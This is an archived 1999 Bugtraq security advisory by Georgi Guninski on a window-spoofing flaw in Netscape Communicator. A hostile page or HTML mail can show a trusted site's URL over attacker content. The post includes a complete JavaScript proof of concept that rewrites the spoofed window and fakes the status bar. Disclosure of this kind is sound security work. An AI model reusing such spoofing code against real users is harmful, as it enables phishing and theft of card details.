home *** CD-ROM | disk | FTP | other *** search
- Date: Tue, 16 Feb 1999 09:46:05 PST
- From: Georgi Guninski <guninski@HOTMAIL.COM>
- To: BUGTRAQ@netspace.org
- Subject: Netscape Communicator window spoofing bug
-
- There is a bug in Netscape Communicator 3.04,4.06,4.5 Win95 and 4.08 WinNT,
- which allows "window spoofing". After visiting a hostile page (or clicking
- a hostile link) a window is opened and its location is a trusted site.
- However, the content of the window is not that of the original site,
- but it is supplied by the owner of the page. So, the user is misled he
- is browising a trusted site, while he is browsing a hostile page and may
- provide sensitive information, such as credit card number.
- The bug may be exploited using HTML mail message.
- It needs Javascript enabled.
-
- Workaround: Disable Javascript
-
- Demonstration is available at:
- http://www.nat.bg/~joro/b14.html
- http://www.whitehats.com/guninski/b14.html
-
- This bug is different from the "frame spoofing vulnerability"
-
- The code is:
- -------------------------------
- <SCRIPT>
-
- function doit()
- {
-
- a.document.open();
- a.document.write("<H1>Look at the location bar!<BR>");
- a.document.write("<A HREF='http://www.whitehats.com/guninski'>Go to Georgi Guninski's home page</A></H1>");
- a.document.close();
- }
-
- function winopen() {
-
- //You may try also:
- //a=window.open("view-source:javascript:location='wysiwyg://1/http://www.yahoo.com';");
-
- a=window.open("view-source:javascript:location='http://www.yahoo.com';");
-
- setTimeout('doit()',30000);
- }
-
- </SCRIPT>
-
- <BR>
-
- <A HREF="javascript:void(0)" onclick="winopen()" onMouseOver="window.status='http://www.yahoo.com';return true">
- Follow this link to go to www.yahoo.com (or somewhere else)
- </A>
- -------------------------------
-
- Note: My web page has moved. Look below for the new URLs.
-
- Regards,
- Georgi Guninski
- http://www.nat.bg/~joro
- http://www.whitehats.com/guninski
-
-
